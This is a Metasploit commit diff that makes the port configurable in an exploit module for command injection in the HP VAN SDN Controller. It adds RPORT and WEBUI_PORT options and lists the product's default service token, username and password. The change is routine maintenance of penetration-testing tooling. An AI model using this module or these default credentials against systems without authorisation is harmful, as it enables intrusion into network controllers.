Land #11119, Add WEBUI_PORT to hp_van_sdn_cmd_inject exploit

documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md

@@ -18,6 +18,14 @@ Tested on 2.7.18.0503.
 
 ## Options
 
+**RPORT**
+
+Set this to the port for the REST API, usually 8081.
+
+**WEBUI_PORT**
+
+Set this to the port for the web UI, usually 8443.
+
 **TOKEN**
 
 Set this to the service token. Defaults to `AuroraSdnToken37`.

modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb

@@ -56,10 +56,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ]
       ],
       'DefaultTarget'      => 0,
-      'DefaultOptions'     => {'RPORT' => 8081, 'SSL' => true}
+      'DefaultOptions'     => {'SSL' => true}
     ))
 
     register_options([
+      OptPort.new('RPORT',      [true,  'REST API port', 8081]),
+      OptPort.new('WEBUI_PORT', [true,  'Web UI port for creds login', 8443]),
       OptString.new('TOKEN',    [false, 'Service token', 'AuroraSdnToken37']),
       OptString.new('USERNAME', [false, 'Service username', 'sdn']),
       OptString.new('PASSWORD', [false, 'Service password', 'skyline'])
@@ -189,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => '/sdn/ui/app/login',
-      'rport'     => 8443,
+      'rport'     => datastore['WEBUI_PORT'],
       'vars_post' => {'username' => username, 'password' => password}
     )